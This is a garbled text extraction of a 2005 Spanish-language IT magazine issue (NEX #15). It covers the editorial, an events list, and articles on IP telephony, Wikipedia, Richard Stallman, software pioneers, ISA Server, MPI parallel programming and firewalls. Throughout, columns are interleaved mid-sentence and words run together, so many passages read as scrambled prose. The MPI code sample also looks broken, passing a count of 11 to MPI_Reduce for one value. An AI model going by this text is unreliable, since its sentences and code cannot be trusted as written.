Beruflich Dokumente
Kultur Dokumente
¿Porquéestamoscontentosconeldesarrollo
delproyecto"NEXITSpecialist"(revista
STAFF deNetworkingyProgramación)?
Director Porsuimpacto,aceptaciónyrepercusión.
- Dr. Carlos Osvaldo Rodriguez.
Esaespartedelarespuesta.Peroquizáslarazónquemás
Propietarios se aproxime, sea porque estamos logrando cumplir nues-
-COR Technologies S.R.L.
tros objetivos propuestos en NEX # 1 (cuando nacimos y
Coordinador Editorial éramos periódico de distribución gratuita): Educar. En
- Carlos Rodríguez Bontempi. muchas oportunidades hemos pensado a NEX como un
"libroencuotas".
Responsable de Contenidos
- Dr. Carlos Osvaldo Rodríguez.
"NEXITSpecialist",
Editores brindaconocimientosentecnologíaIT.
- Carlos Vaughn O'Connor.
- Carlos Rodríguez.
Pero además, es un conocimiento muy especial. Uno que
prepara,capacitaygeneraunámbitodediscusión.Ysirve
Marketing y Publicidad enormementeaquienestáenlabúsquedadeempleoopre-
- Ulises Roman Mauro. umauro@nexweb.com.ar parándoseenunaUniversidadoCarreraTécnicaparasalir
enunfuturoalmercadolaboral.Porotrolado,actualizay
Distribución traetemasmuynuevosparatodosconinterésyqueestén
- Miguel Artaza.
activosenredesyprogramación.
Diseño Gráfico Decidimosdesdeuncomienzoabarcartodaslastecnologí-
- Esteban Báez. as y sus temas asociados: sistemas operativos bases de
- Carlos Rodríguez Bontempi. datos,programación,seguridad,genteehistoriaenIT,ca-
Preimpresión e Impresión pacitación, certificaciones internacionales. Sin importar
Impresión: IPESA Magallanes 1315. Cap. Fed. qué implementación: Linux-like, Windows, Java, .NET,
Tel 4303-2305/10 Mono,Oracle,SQLDB2,MySQL,Postgres...
Impresión de esta Edición 8.000 ejemplares En"NEXITSpecialist"ellectordeberíaencontrarlofunda-
mentaldecadatópicoyasítener"elpanoramatotal"(loque
Distribución sellamaeninglés"theBigPicture")demododedominar
Distribución en Capital Federal y Gran Buenos Aires:
Distribuidora SANABRIA. Baigorria 103. Cap. Fed. todosloselementoalmomentodetomarunadecisión(por
Distribuidora en Interior: Distribuidora Austral de ejemplolaboral,alorientarsusestudios,susdecisionesde
Publicaciones S.A. Isabel la Católica 1371 Capital compraoensudiariatareaenIT).
Federal. Dijimosenelprimernúmerolatrascendenciaquetienehoy
NEX-Revista de Networking y Programación laseguridadinformáticayasíimplementamoslosvolúme-
Registro de la propiedad Intelectual en trámite nesquetantarepercusiónhantenidodeEthicalHackingy
leg número 3038 ISSN 1668-5423 quecontinuaremosenpróximasediciones.
Dirección: Av. Córdoba 657 P 12
C1054AAF - Capital Federal
Estamostambiéncontentosporquésehansumadoalpro-
Tel: +54 (11) 4312-7694 yectocontribuyendoconnotastécnicas:Microsoft,CISCO,
Queda prohibida la reproducción no autorizada varios grupos Open Source, Snoop Consulting, Panda
total o parcial de los textos publicados, mapas, Software,newsletterNNL.
ilustraciones y gráficos incluídos en esta edición.
La Dirección de esta publicación no se hace re-
Novedad 1: desde este número incorporaremos artículos
sponsable de las opiniones en los artículos firma-
sobretendenciasdelmercadoITdemodoquequiendeba
dos, los mismos son responsabilidad de sus tomar decisiones tenga una evaluación completa de las
propios autores. Las notas publicadas en este varias tecnologías que van surgiendo e imponiéndose. En
medio no reemplazan la debida instrucción por este fascículo en particular es "VOIP" (VOice over IP) o
parte de personas idóneas. La editorial no asume mejordicho"ComunicacionesIP".
responsabilidad alguna por cualquier consecuen-
cia, derivada de la fabricación, funcionamiento
Novedad 2: una Nota de Opinión a cargo de Ricardo D.
y/o utilización de los servicios y productos que se Goldberger,productordelnewsletterelectrónicoT-Knos.
describen, analizan o publican.
Si desea escribir para nosotros, enviar un e-mail a:
articulos@nexweb.com.ar.
Foto: © 2005 Hemera Technologies Inc.
www.nexweb.com.ar
#15
Indicegeneraldecontenidos
6 - Eventos.
NOTASDESTACADAS
8 - Comunicaciones IP en Latinoamérica:
Justificaciones, Cifras y Realidades. ComunicacionesIP
12 - Wikipedia. enLatinoamérica:
14 - Richard Stallman. Justificaciones,
CifrasyRealidades.
16 - Innovadores del Software.
Conozca las tendencias de mercado de
20 - Microsoft ISA Server. VOIP (voz sobre IP) y sus "players" más
importantes (actuales y nuevos).
25 - MPI: Programación en Paralelo.
46 - SQUID. FIREWALLS
¿Qué es un Firewall? ¿Qué ofrece Linux y
52 - X Windows. Windows?.Todo esto en tres artículos.
57 - Opinión: Ricardo D. Goldberger.
ISASERVERYSQUID
59 - Ethical Hacking Vol. 3
Dos artículos que nos introducen al mundo
de Proxy-servers.
LAMP
Linux, Apache, MySQL y PHP. En este artículo
le explicamos su trascendencia y como
Ilustración de portada por Marcos Severi.
X-WINDOWS
No podemos no conocer esta tecnología que
nos permite manejar la capacidad gráfica del
mundo *UNIX.
ETHICAL
HACKING
VoL.3
Artículos de seguridad informática: Sniffers, Pharming,
Hacking Unix, Comunicaciones Seguras. No deje además de
leer el interesante artículo de Carlos Tori (editor del newslet-
ter nnl de seguridad informática) (www.nnlnews.com))
sobre Habeas Data y el acceso público a datos sensibles y sus
posibles consecuencias
59 En el próximo...
60 Sniffers #16
WEB SERVER:
Buffer Overflows,
ComunicacionesSeguras SQL injections…
68 BASES DE DATOS:
76 HackingUnixPaso7
Oracle, SQL DB2,
MySQL, Postgres...
PARADIGMA
78 Netcat,lanavajasuiza DE PROGRAMACION:
INNOVA05 COSENTIC05
CongresodeSeguridaden
21 de Abril 2005
UTN Buenos Aires TecnologíadeInformacióny
Jornada ideada para que las empresas mues- Comunicación
tren sus nuevos proyectos y avances tecnoló-
gicos a la comunidad Universitaria. 7 y 8 de Junio 2005
Informes Sheraton Libertador
4803-6100 mgparra@worktec.com.ar Tiene el objeto de profundizar y educar sobre
la necesidad y problemática de la seguridad
de la información a directivos de sistemas y
MOVIL2005
administración y finanzas, ejecutivos y consul-
tores.
25 y 26 de Abril de 2005
Informes
Sheraton Hotel Buenos Aires.
4803-6100 mgparra@worktec.com.ar
Dos días de conferencias con oradores líderes
del mercado que analizarán el nuevo escenario
de acción y el futuro del negocio Internet3ºJornadasde
Informes ReflexiónyNegociosen
4345-3036 eventomovil@convergencia.com.ar Internet
RedesdeGobierno2004 24 de Junio 2005
Marriot Plaza Hotel
19 y 20 de Mayo 2005 Informes
Predio Ferial de Buenos Aires 4345-3036 eventos@convergencia.com.ar
Informes
4345-3036 eventos@convergencia.com.ar TelefoníaIP
LaconvergenciaTotal
EXPOMATICA2005
24 y 25 de Agosto de 2005
19 al 22 de Mayo de 2005 Sheraton Hotel Buenos Aires
Sheraton Hotel Córdoba, Av. Duarte Quirós Oportunidad de capacitación y actualización
1300. junto a los líderes del sector. La audiencia más
El Objetivo de la exposición es allegar a las calificada. 2004: 470 asistentes. 19 sponsors.
marcas y mayoristas al canal del Interior del 12 workshops.
país, conseguir contactar directamente los pro- Informes
veedores de IT con las empresas 4345-3036 eventos@convergencia.com.ar
Informes
0351-4723053 expomatica@jointgroup.com.ar
www.expomatica.com.ar TECNOAR2005-2°
EXPOSICIÓNNACIONAL
Segundo Congreso Nacional
DEINFORMÁTICAY
deSoftwareLibre:USUARIA
TECNOLOGÍA
6 y 7 de Junio 2005
1, 2 y 3 de septiembre de 2005.
Buenos Aires Sheraton Hotel,
Patio de la Madera de la ciudad de Rosario
Su enfoque se dirige hacia cuatro grandes y
Informes
diversos planos (Estrategias, Soluciones
www.tecnoar.org.ar info@tecnoar.org.ar
Reales, Tecnología y Migraciones)
Informes
www.softlibre.org.ar EXPOCOMM2005
USUARIA: Rincón 326 (C1081ABH) - Capital
Federal 27 al 30 de septiembre de 2005
La Rural, predio ferial de Palermo
NETWORKERSSOLUTIONS Por 4to año consecutivo será el lugar para
conocer las soluciones de redes empresariales
FORUM2005
que pueden cambiar el ritmo de los negocios
de su empresa.
6 al 9 de Junio de 2005
Informes
Hotel Hilton de Buenos Aires, Argentina
www.expocomm.com.ar
Los temas: Telefonía IP, Seguridad y Manager
infoexpocomm@ejkreed.com
Services. Informes
www.cisco.com/ar/networkers/registration.html
http://www.cisco.com/cr/networkers http://www.menorenlared.org/
COMUNICACIONES IP
ENLATINOAMÉRICA:
JUSTIFICACIONES,
CIFRASYREALIDADES.
Elartículoquesiguenosda Empresas de todos los tamaños y sectores e- redes simultáneas, con todos los costos que
aconocerlastendenciasdel conómicos en Latinoamérica, están cambiando esto genera en materia de administración,
sus sistemas tradicionales de Telefonía, más mantenimiento y operación, si es posible
mercadodeTelefoníaIP,o conocidos como PBX, por soluciones de comu- contar con una única red tanto para los datos
mejorexpresado:COMUNI- nicaciones basadas en IP (Internet Protocol, como para la voz?
CACIONESIP.Lanotaestá Protocolo de Internet)). De esta manera, las Comunicaciones IP son
fundamentalmentebasadaen Esta tendencia, ampliamente diagnosticada y mucho más que el uso de las redes in-
unestudiohechoporCISCO respaldada por las principales firmas de inves- teligentes de datos y del Protocolo de Internet
tigación de mercados, por consultores y analis- (IP) para manejar las llamadas telefónicas. Las
(verhttp://www.ciscoredac- tas independientes y, en especial, por los comunicaciones IP son atractivas para las em-
cionvirtual.com)Esintere- mismos clientes que toman la decisión de dejar presas por varias razones y motivos, además
santeobser varcomoenel de lado sus viejos sistemas telefónicos, tiene su de añadir funcionalidades y aplicaciones que
artículoserepitelafrase justificación y razón de ser en las bondades y van mucho más allá de las que ofrece la tele-
convergenciaderedes. ventajas que ofrece la convergencia de redes. fonía tradicional.
La convergencia de redes, que se inició hace En primer lugar, las empresas pueden ahorrar
Tambiénconozcamosalos pocos años de manera tímida y aislada y que dinero en equipo, instalación y mantenimien-
nuevosplayerscomo crece de manera acelerada, no es más que la u- to, al contar con una única red tanto para las
Microsoft. nificación de la red de voz y la red de datos en computadoras como para los teléfonos, en
una única red de comunicaciones IP.Y es que la lugar de tener redes especializadas para cada
ecuación tiene mucho sentido. ¿Para que tener uno de ellos. En segundo lugar, las
Comunicaciones IP pueden reducir los costos
de llamadas telefónicas, debido a que las lla-
madas que viajan por la red pública pueden
viajar por la red corporativa y aún por
Internet. Y en tercer lugar, las Comunicaciones
IP aumentan la productividad y la flexibilidad
de las organizaciones y de los empleados.
Las soluciones de Comunicaciones IP son
ideales para empresas de cualquier tamaño
que deseen aprovechar al máximo sus in-
fraestructuras de comunicaciones, tanto si la
empresa se dispone a instalar un sistema tele-
fónico nuevo, finaliza el contrato de arren-
damiento de un sistema de distribución de
central privada (PBX) o un sistema de correo de
voz tradicional,o bien desea ampliar las capaci-
dades de una PBX existente.
4.000.000 TELÉFONOS IP -
100.000 EN LATINOAMERICA
*A Enero 2005
TENDENCIACRECIENTE
WIKIPEDIA
Bajo el mensaje "imagina un mundo en el el conocimiento es poderosa", describe
que cada persona tiene acceso libre a la suma Jimmy Wales, fundador de Wikipedia.
del conocimiento humano" se presenta al Por otro lado, se están preparando diferentes
La Enciclopedia mundo el ambicioso proyecto de Wikipedia, distribuciones de Wikipedia en CD y DVD.
que al día de hoy se ha transformado en la Pronto estará disponible una versión en
más consultada de la red enciclopedia más consultada de Internet y en alemán distribuida por Directmedia
Por David Alejandro Yanover,Fundador y Director de la la más sólida comunidad, dado que son los Publishing, y se incluirá una versión bilingüe
revista digital de informática MasterMagazine, con propios usuarios de la WWW quienes contri- en francés e inglés como parte de una dis-
referencia en www.mastermagazine.info buyen al crecimiento de la información. tribución de Mandrakesoft Linux.
Actualmente, Wikipedia figura entre los diez Daniel Pink, columnista de la revista Wired,
primeros lugares de referencia en Alexa, explicó recientemente a Wikipedia como "la
entidad que mide el tráfico y la popularidad biblioteca auto-organizable auto-reparable
de los sitios de Internet. Ha llegado a la cifra e hiperadictiva del futuro". BBC Noticias la
de un millón de artículos, y está disponible llamó "una de las más confiables y útiles
en más 195 idiomas, entre los cuales fuentes de información disponibles en o
aparece el Klingon, de la exitosa serie Star fuera de línea," y Tim Berners-Lee, padre de
Trek. Por su parte, la versión en español, la Web, la identificado como "la fuente de
creada en mayo de 2001, reúne cerca de 45 todo el conocimiento".
mil notas informativas, número que crece a Pero Wikipedia no se convirtió en la principal
más del 12% cada mes. Mientras que la enciclopedia de Internet de la noche a la
entrega digital en inglés supera las 500 mil. mañana, sino que fue un proceso que llevó
Es sumando los artículos disponibles en unos cuatro años en consolidarse. En enero
cada idioma como llega al millón de in- de 2001 nacía Wikipedia, fundada por la
formes a fines del 2004. Son agregados empresa Bomis de Estados Unidos, y con ello,
cerca de 2.500 por día. "La idea de compartir un sistema propio de publicación y control
Wikibúsqueda
R i c h a r d S t a l l m a n
PorDavidAlejandroYanover
ElPadre
delsoftwarelibre
"Free as in Freedom ("Libre" como en "Libertad" y no "Gratis") , la cruzada de
Richard Stallman para un Software Libre", el título del libro de Sam Williams publi-
cado por O´Reilly en 2002,define a Richard Mathew Stallman.En este artículo inten-
tamos conocer un poco quién es y cuáles han sido sus contribuciones.
C
onocido por sus iniciales RMS, Symbolics, la cual intentaba activamente total y operativo: el sistema operativo
Richard Matthew Stallman es la cara reemplazar el software libre del laboratorio GNU/Linux (referido de manera errónea sim-
del movimiento del software libre. con su propio software privativo. Durante dos plemente como Linux).
Responsable de numerosas innova- años, de 1983 a 1985, Stallman, solo, duplicó Las motivaciones políticas y morales de
ciones dentro de la industria IT, Stallman los esfuerzos de los programadores de Richard Stallman le han convertido en una
difunde su visión por el mundo. Sus mayores Symbolics para impedir que adquirieran un figura controvertida. Muchos programadores
logros como programador incluyen el editor monopolio sobre los ordenadores del labora- de influencia que se encuentran de acuerdo
de texto Emacs, el compilador GCC, y el depu- torio. Por ese entonces, sin embargo, él era el con el concepto de compartir el código, di-
rador GDB, bajo la rúbrica del Proyecto GNU. último de su generación de hackers. fieren con las posturas morales, filosofía per-
Pero su influencia es mayor por el establec- Se le pidió que firmara un acuerdo de no di- sonal o el lenguaje que utiliza Stallman para
imiento de un marco de referencia moral, vulgación y que llevara a cabo otras acciones describir sus posiciones. Un resultado de estas
político y legal para el movimiento del soft- que él consideró traiciones a sus principios. En disputas condujo al establecimiento de una al-
ware libre, como una alternativa al desarr-ollo 1986, Stallman publicó el Manifiesto GNU, en ternativa al movimiento del software libre, el
y distribución de software privativo. Es el cual declaraba sus intenciones y motiva- movimiento del código abierto.
también inventor del concepto copyleft, un ciones para crear una alternativa libre al Stallman ha recibido numerosos premios y
método para licenciar software de tal forma sistema operativo Unix, el cual nombró GNU reconocimientos por su trabajo, entre ellos una
que este permanezca libre y su uso y modifi- (GNU es un acrónimo recursivo que significa membresía en la MacArthur Foundation en
cación siempre reviertan en la comunidad. "GNU No es Unix"), que también quiere decir 1990, el Grace Hopper Award de la Association
El padre del software libre nació el 16 de ñu en inglés (de ahí esos dibujos-logotipos). for Computing Machinery en 1991 por su
marzo de 1953 en Manhattan, Nueva York. Poco tiempo después se incorporó a la organi- trabajo en el editor Emacs original, un doctora-
Más tarde, en 1971, siendo estudiante de zación no lucrativa Free Software Foundation do honorario del Royal Institute of Technology
primer año en la universidad de Harvard, para coordinar el esfuerzo. Inventó el concep- de Suecia en 1996, el Pioneer award de la
Stallman se convirtió en un hacker del labora- to copyleft, el cual se utilizó en la Licencia Electronic Frontier Foundation en 1998, el Yuki
torio de Inteligencia Artificial (IA) del MIT. En Pública General GNU (conocida por sus siglas Rubinski Memorial Award en 1999, y el Takeda
los '80, la cultura hacker que constituía la vida en inglés GPL) en 1989.La mayoría del sistema Award en 2001. Por último, el año pasado
de Stallman, empezó a disolverse bajo la GNU, excepto el núcleo, se completó aproxi- recibió un Doctorado honorario otorgado en
presión de la comercialización en la industria madamente al mismo tiempo. En 1991, Linus nuestro país por la Universidad de Salta.
del software. En particular, otros hackers del Torvalds liberó el núcleo Linux bajo los térmi- Fuentes: - http://www.wikipedia.org
laboratorio de IA fundaron la compañía nos de la GPL, completando un sistema GNU - http://www.stallman.org
1970
INNOVADORES
del software
E.F.Codd
PorNúriaPratsiPujol
UnospocoshanrevolucionadolaIndustriaIT.
Lospionerosdelatecnologíahanrealizado
suscontribucionesdesdegarajes,residencias
estudiantilesylaboratoriosdeinvestigación.
Enestaprimeraentrega,conocemosaquienes
haninnovadoelmundodelsoftware.
1969
"¿Quédeberíaexistir?
Paramí,esaeslapreguntamásexcitante
queunosepuedaimaginar".[1]
PaulAllen.
D.Ritchie
C
uando el editor me propuso el tema, formar parte del plantel de programadores de
me pareció interesante investigar las IBM. Luego de vivir en Canadá durante algún
vidas de los más destacados progra- tiempo, recibe el doctorado en Informática en
madores de la historia de la informáti- la Universidad de Michigan, en 1963. Continuó
ca. Gente que tuvo ideas innovadoras. Pero la trabajando para IBM, esta vez en California.
verdad es que fue más que eso. ¿Es que acaso no Durante las dos décadas siguientes, dedicó su
es lo más importante saber qué es lo que necesi- trabajo a teorías sobre el manejo de datos.Creó el
tamos? ¿Y si aparte de saberlo, desarrollamos un modelo relacional que derivó en la industria de
programa para saciar esa necesidad? Eso fue lo base de datos. Para su propia decepción, IBM no
que descubrí: estas personas habían tenido una explotó su sugerencia,implementando la base de
idea brillante y sabían como desarrollarla. datos de Oracle. El modelo estaba diseñado para
guardar información con una estructura simple
¿Se imaginan un mundo sin Unix,sin Windows o (tablas con columnas y filas, quizás algo trillado
sin Linux? ¿Qué sería hoy de las computadoras? hoy día pero no en aquel momento),y realizar pe-
queñas transacciones.
1969 A lo largo del artículo, presento los programas En 1984 deja IBM y establece dos compañías dedi-
que cambiaron la historia, las personas que cadas a los sistemas de manejos de datos. Ha
contribuyeron a desarrollarlos y sus ideas. hecho otras muchas contribuciones, aunque el
modelo relacional es que me más se destaca.
K.Thompson
P.Allen
también a demostrar la portabilidad, que hizo de primera compañía Traf-O-Data hasta que
Unix un sistema operativo tan popular, basado en comenzaron la Universidad.
su potencia y versatilidad. Paul Allen comenzó sus estudios en la
Introduciendo nueva sintaxis al lenguaje B de Universidad de Washington, estudios que
Thompson, creó el lenguaje de programación C. luego abandonará para alentar a Gates a abrir
Ha recibido premios y la Medalla de Tecnología de una compañía de software juntos: Microsoft, la
EE.UU.junto a Thompson. cual se ve forzado a abandonar en 1983 debido
Conocido como dmr en la jerga de Unix,es actual- a que se le diagnostica la enfermedad de
mente manager de un pequeño grupo de inves- Hodgkin's, tratado y recuperado exitosamente
tigadores en Bell Labs / Lucent Technologies.[2] de la misma.
En el 2000 renuncia a su cargo en Microsoft.
Kenneth Thompson Actualmente es uno de los hombres más ricos
del mundo, dueño de radios, un equipo de la
Nació en 1943 en Louisiana, EE.UU. A los 23 NBA y uno de fútbol americano. También in-
años, se graduó como Ingeniero Electrónico en vierte muchísimo dinero en proyectos de in-
la Universidad de California en Berkeley. vestigación (como lo ha hecho con el Instituto
Ken, como se lo conoce en la jerga de los usua- de Ciencia del Cerebro), arte y música. [4] 1975
rios Unix, comenzó trabajando en un proyecto
conocido como Multics. Se trataba de una pro- Bill Gates
ducción inmensa con muchísima gente traba-
jando en ella.El propósito era soportar miles de Nace en 1955 en Seattle, EE.UU. Funda
usuarios logueados cuando no se podía Microsoft en 1975 junto a Paul Allen. Todo
siquiera soportar tres.En 1969, se cansó de este comienza con una publicación de la Altair 8080
B.Gates
proyecto y decidió escribir su propio sistema (el primer kit de microcomputadora) en la
operativo. Una semana en el kernel, una revista Popular Electronics. Allí es donde ambos
semana en el file system y al cabo de un mes ven su oportunidad, intuyendo que el mercado
Ken tenía terminado Unix. de las computadoras personales explotaría. Es
La gente dijo: "si miles de personas escribieron así como diseñaron el lenguaje de progra-
Multics, entonces un sistema operativo escrito mación BASIC, y se lo venden a Altair (que en
por una sola persona debe se Unix". Gracias a ese momento carecía de software). Al año si-
su creación, a lo largo de los años sucesivos le guiente, Gates abandona sus estudios para
fueron entregados varios premios. [3] fundar Microsoft, que para 1980 se convertirá
Kenneth Thompson fue también quien escribió en la principal compañía dedicada a la industria
el lenguaje B, que es el precursos del lenguaje del software. Bill Gates es hoy día el hombre
C, desarrollado por Dennis M. Ritchie. más rico del mundo.Tiene mujer y tres hijos. [5]
En el año 2000 se retira de Bell Labs y actual-
mente es miembro de Entrisphere, Inc. Bill Atkinson
Se graduó en la Universidad de San Diego, en
Paul Allen California. Trabajó para Apple Computers. Su
trabajo en QuickDraw durante los años 70s y 1983
Nacido en 1953 en Seattle, EE.UU.A los 14 años 80s, sirvieron para sentar las bases de Lisa y
conoció en el colegio a Bill Gates, donde Macintosh. La magnífica performance de GUI
comenzaron a descubrir el mundo de la com- es mérito de su trabajo. Fue también el creador
putación. Afortunadamente para ellos, la de MacPaint, la primera aplicación de Mac que
B.Atkinson
Web-biografía:
[1] http://www.paulallen.com
[2] http://cm.bell-labs.com/who/dmr/index.html
[3] http://www.bell-labs.com/history/unix/thompsonbio.htm
[4] http://www.research.ibm.com/resources/news/20030423_edgarpassaway.shtml
[5] http://www.microsoft.com/billgates/
[6] http://www.billatkinson.com/aboutTheArtist.html
[7] http://www.cs.helsinki.fi/u/torvalds/
[8] http://www.forbes.com/lists
Microsoft
ISA Server Mucho más que un firewall tradicional
POR MARCELO C. A. ROMEO
Actualmente, la mayor preocupación de las empresas está sin Services y varios clientes de mensajería in-
dudas relacionada con la cantidad de correo basura entrante stantánea, por sólo nombrar algunos. Cada
uno de estos tipos de contenido http, repre-
(spam), como así también el potencial peligro que implica abrir un senta un potencial peligro para nuevos tipos
mensaje de email que contenga en su interior algún virus o de exploits, buffer overflows y demás agu-
gusano. Pero ninguna empresa puede hoy día prescindir del correo jeros de seguridad. Lo que es contenido
electrónico; absolutamente todos, desde el primer al último em- OWA, por ejemplo, va encriptado con SSL
pleado, hacen uso de los servidores internos de Exchange para (Secure Socket Layer). Y los firewalls tradi-
cionales son incapaces de detectar ataques
tener acceso a sus cuentas de email. En lo que a seguridad se que viajan por SSL.
refiere, otorgar ese acceso se vuelve a menudo una tarea suma-
mente compleja para administradores y usuarios. UnamiradaaISAser ver.
Siempre existe la opción de brindar acceso fase gráfica diferente. Por otro lado, OWA hace Microsoft's firewall, Internet Security and
remoto al Exchange por medio de una VPN uso del Internet Information Server (IIS), lo Acceleration (ISA) Server 2000, brinda el clásico
(Virtual Private Network), si bien esto le com- que implica la implementación de otro nivel packet filtering y stateful inspection optimiza-
plica la vida al usuario y no deja de implicar de seguridad más. Un firewall con packet fil- do con un filtro para la capa de aplicación, que
importantes riesgos. No olvidemos que un tering y stateful inspection (capa 4 en el le permite defenderse contra ataques a la capa
cliente VPN se conecta externamente a una modelo OSI) es poco lo que pude hacer por de aplicaciones que viajen en paquetes encrip-
red interna, gozando de los mismos privile- proteger a un IIS server contra los ataques ac- tados bajo SSL.Esta es una tarea que la mayoría
gios y accesos a recursos tal como si estuviera tuales (Code Red, Nimbda, Goner, etc.), ya que de los firewalls son incapaces de realizar.
conectado localmente. Y a menos que se im- estos utilizan para sus fines la capa de apli- Cuando un cliente envía un requerimiento
plementen controles adicionales, la privaci- cación (capa 7 en el modelo OSI). https (http con SSL) a un servidor Web protegi-
dad de nuestra VPN puede siempre verse Un firewall común con packet filtering y state- do con ISA Server, éste se encarga de desen-
comprometida no sólo por hackers, sino ful inspection, controla el destino y el puerto de criptar los paquetes y procede luego a inspec-
también por proveedores, business partners y todo paquete entrante y se lo pasa al servidor en cionarlos. Una vez realizada la inspección, ISA
todo aquel que tenga acceso externo al la red interna. Aún así, los ataques actuales Server envía los paquetes válidos al servidor
Exchange o a la Intranet. viajan dentro de estos paquetes. Hasta no hace Web interno vía http o https. Luego de recibir
El acceso remoto vía Exchange Outlook Web mucho (tan sólo unos pocos años), los únicos respuesta por parte del servidor, ISA Server
Access (OWA) soluciona sólo parte del proble- paquetes que viajaban por puerto 80 eran de hace un reply al cliente por medio de una
ma, con el costo de limitar la funcionalidad y tráfico Web. Hoy día, además del tráfico Web, conexión https. Este nivel de seguridad se
tener que acostumbrar al usuario a una inter- por el puerto 80 pasan OWA, XML Web vuelve crucial para las empresas de hoy. Su in-
Stateful Inspection
MPI
MessagePassingInterface,laHerramienta
deProgramaciónenParaleloenClusters
paraComputacióndeAltoRendimiento.
POR EL DR. REINALDO PIS DIEZ
ElpresenteartículonosdaunaexcelenteintroducciónaltemadeHPC
(HighPerformanceComputing,ComputacióndeAltoRendimiento).
HPC es hoy usado en aplicaciones tan diversas como investigación
científicabásica,diseñodeautos,simulacionesnuméricasenindustria
química,farmacéuticaymedicinal,industriadeserviciosfinancieros,
etc. Procesamiento paralelo y la herramienta de programación MPI
son actualmente un "estándar". El tema es complejo y difícil de ex-
plicaraNOespecialistas.Consoloaceptarlaideageneraldealgunos
conceptosmatemáticosqueseintroducenparaejemplificar,elartícu-
losevuelveclaroeinstructivo.Esperamosacepteeldesafío.
L
Los clusters para computación de tos y nuestro cluster está compuesto por 10
alto rendimiento (High Performance nodos. En lugar de saturar un nodo del cluster
Computing, HPC) han sido diseña- con toda la tarea, disponemos el proceso de
dos para llevar a cabo operaciones forma que la suma de los primeros 10.000 pro-
de cálculo que demandan importantes requeri- ductos sea rea-lizada en el primer nodo,la suma
mientos computacionales [1]. Un valor agrega- de los productos 10.001 a 20.000 se lleve a cabo
do en los clusters HPC es la posibilidad de efec- en el segundo nodo y así sucesivamente hasta
tuar procesos en paralelo, es decir, utilizar si- que la suma de los productos 90.001 a 100.000
multáneamente más de un nodo del cluster las realice el décimo nodo. El primer nodo
para resolver el problema en cuestión. recibe las sumas parciales de los nueve nodos
La paralelización de un algoritmo no es tarea restantes, efectúa la suma final y reporta el re-
trivial ya que requiere que las tareas que serán sultado. Idealmente, el proceso paralelizado
distribuidas entre los nodos del cluster sean debe consumir la décima parte del tiempo que
completamente independientes unas de otras. consumiría en un único nodo.
El ejemplo más sencillo de un proceso fácil- Ahora bien, programar un producto escalar en
mente paralelizable es el producto escalar de lenguajes como Fortran (77, 90 o 95), C o C++
dos vectores A = {a1, a2, ..., aN} y B = {b1, b2, ..., es un ejercicio que no requiere más de 10 líneas
bN}. El producto escalar A"B se define según: de código. Sin embargo, ¿cómo logramos para-
A"B = a1 · b1 + a2 · b2 + ... + an · bn
lelizar el algoritmo? Aquí es donde entran en
acción los entornos de programación en parale-
Ya que cada producto del tipo ai · bi es indepen- lo que no son otra cosa que bibliotecas de fun-
diente de los otros, puede ser realizado por un ciones que llevan a cabo la comunicación y el
nodo determinado sin que las tareas efectu- pasaje de información entre nodos.
adas por los otros nodos interfieran con ella. Se acepta en la actualidad la existencia de tres
Para ser más específicos, supongamos que métodos para programar en paralelo: message
nues-tros vectores contienen 100.000 elemen- passing, distributed data structures y live data
Fig. 1 if(id_proceso == 0)
{
#include <stdio.h> printf("Entrar número de términos en la serie\n");
#include "mpi.h" scanf("%d", &nro_terminos);
}
int main(int argc, char **argv)
{ MPI_Bcast(&nro_terminos, 1, MPI_INT, 0, MPI_COMM_WORLD);
int nro_procesos, id_proceso;
for(i = id_proceso; i < nro_terminos; i += nro_procesos)
MPI_Init(&argc, &argv); {
MPI_Comm_size(MPI_COMM_WORLD, if((nro_terminos - i) % 2)
&nro_procesos); sum += (float) 1 / (nro_terminos - i);
MPI_Comm_rank(MPI_COMM_WORLD, else
&id_proceso); sum -= (float) 1 / (nro_terminos - i);
}
printf("Un saludo desde el proce-
sador %d de un total de %d\n", MPI_Reduce(&sum, &Gsum, 11, MPI_FLOAT, MPI_SUM, 0, MPI_COMM_WORLD);
id_proceso + 1, nro_procesos);
if(id_proceso == 0)
MPI_Finalize(); printf("El logaritmo natural de 2 es %f\n", Gsum);
return 0; MPI_Finalize();
} return 0;
}
¿Qué es un
No se podría hablar de Internet, redes locales, aplicaciones compartidas y comer-
cio electrónico sin mencionar los firewall. Estos componentes de software, hard-
ware, o combinación de ellos, son fundamentales para proteger la integridad de
la información en una sociedad cada vez más dependiente de las redes de datos.
fig. 1
Foto: © 2005 Hemera Technologies Inc. Revista de Networking y Programación / NEX - 31|
fig. 2
WWW) o Telnet (para sesiones remotas).Así se evita que usuarios mal inten- el resto de la red local sigue protegida por el firewall.Esta estructura de DMZ
cionados del exterior de la red,intenten acceder a un equipo local mediante puede hacerse también con un doble firewall (Fig.3).
un protocolo específico. Los firewalls se pueden usar en cualquier red. Es habitual tenerlos
Para un administrador de firewall es mucho más sencillo aplicar el filtrado como protección de Internet en las empresas, aunque ahí también
por puertos o protocolos que los anteriores, dado que los otros métodos suelen tener una doble función: controlar los accesos externos hacia
(IPs,nombres de dominio y palabras clave) requieren de más vigilancia y ad- adentro y también los internos hacia el exterior; esto último se hace
ministración del firewall, aunque ningún método excluye a los demás de con el firewall o frecuentemente con un proxy (que también utilizan
poder ser utilizados. reglas, aunque de más alto nivel).
Ahora bien, para que un firewall entre redes funcione como tal debe tener También en empresas de hosting con muchos servidores, lo normal es
al menos dos placas de red.Podemos apreciar la tipología clásica de un fire- encontrarnos con uno o más firewalls ya sea filtrando toda la insta-
wall en la Fig.1. lación o parte de ella.
Dependiendo de las necesidades de cada red, puede ponerse uno o más Sea el tipo de firewall que sea,generalmente no tendrá más que un conjun-
firewalls para establecer distintos perímetros de seguridad en torno a un to de reglas en las que se examina el origen y destino de los paquetes del
sistema. Es frecuente también que se necesite exponer algún servidor a protocolo TCP/IP. En cuanto a protocolos, es probable que sean capaces de
Internet,como es el caso de un IIS,un Apache o un Exchange Server,en cuyo filtrar muchos tipos de ellos, no sólo los TCP, sino también los UDP, ICMP, GRE
caso obviamente es necesario permitir cualquier tipo de conexión a ellos.Lo y otros protocolos vinculados a VPNs. Este podría ser (en pseudo-lenguaje)
que se recomienda entonces, es situar dichos servidores en lo que se de- un conjunto de reglas de un firewall del primer gráfico:
nomina una DMZ o zona desmilitarizada. Es estos casos, el firewall debe
tener tres placas de red (Fig.2). Todo lo que venga de la red local al firewall = ACEPTAR.
En la zona desmilitarizada o DMZ se pueden poner tantos servidores como Todo lo que venga de la IP de mi casa al puerto TCP 22 = ACEPTAR
